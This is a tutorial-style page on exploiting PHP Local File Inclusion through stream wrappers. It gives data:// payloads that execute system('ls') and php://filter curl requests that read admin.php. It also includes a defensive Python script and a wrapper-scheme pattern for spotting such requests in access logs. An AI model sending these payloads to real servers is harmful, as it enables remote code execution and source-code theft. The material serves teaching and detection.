PHP Wrappers

PHP wrappers are additional code that tells the stream how to handle specific protocols/encodings. There are about 12 different PHP wrappers, and additional custom wrappers can also be introduced. You can read about these wrappers here.

PHP wrappers can greatly help to exploit a Local File Inclusion (LFI) vulnerability in cases where the server has checks to prevent LFI.

The following is an example of including code in a file-reading step within a PHP page:

http://192.168.1.1/pricelist.php?file=data://text/plain,<?php%20echo%20system('ls');?>

The following is an example of a wrapper used to display the contents of a file, with or without encoding:

curl http://192.168.1.1/pricelist.php/index.php?page=php://filter/resource=admin.php
curl http://192.168.1.1/pricelist.php/index.php?page=php://filter/convert.base64-encode/resource=admin.php

In this manner, code can be introduced either to read a local file or to access a file from a remote server through HTTP.
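
On the detection side, requests like the ones above stand out in web server logs because a parameter that should hold a file name carries a stream-wrapper scheme. The following is an added example, not code from the original page: it assumes access logs in the common/combined format, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Wrapper schemes listed in the PHP manual. http/ftp/file are included because
# a parameter meant to carry a local file name should not carry any scheme.
WRAPPERS = ("php", "data", "file", "http", "https", "ftp", "ftps", "zip", "phar",
            "glob", "expect", "ssh2", "rar", "ogg", "zlib",
            "compress.zlib", "compress.bzip2")
# PHP also accepts "data:" without the double slash, so match it separately.
SCHEME_RE = re.compile(
    r"\b(?:(" + "|".join(map(re.escape, WRAPPERS)) + r")://|(data):)", re.I)
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /pricelist.php/index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /pricelist.php?file=php%253A%252F%252Ffilter%252Fresource%253Dadmin.php HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /pricelist.php?file=data:text/plain,hello HTTP/1.1" 200 17',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /pricelist.php?file=prices.txt HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253A -> %3A -> :) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def wrapper_hits(log_line):
    """Return [(param, scheme, decoded_value)] for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        found = SCHEME_RE.search(value)
        if found:
            scheme = (found.group(1) or found.group(2)).lower()
            hits.append((name, scheme, value))
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(wrapper_hits(line))
```

Parameters that legitimately carry URLs (redirect targets, callbacks) will also match on http/https, so treat hits as triage input and scope the check to parameters that feed file includes.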
